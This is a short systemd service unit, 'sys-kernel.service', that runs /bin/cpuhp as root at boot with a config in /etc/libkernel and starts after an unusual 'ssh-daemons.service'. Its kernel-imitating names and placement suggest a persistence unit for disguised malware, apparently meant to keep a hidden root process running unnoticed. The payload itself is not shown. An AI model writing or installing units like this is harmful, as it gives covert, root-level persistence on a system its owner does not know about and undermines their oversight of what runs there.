[Unit]
Description=sys-kernel.service
After=ssh-daemons.service
 
[Service]
User=root
ExecStart=/bin/cpuhp --config /etc/libkernel
Type=idle
 
[Install]
WantedBy=default.target
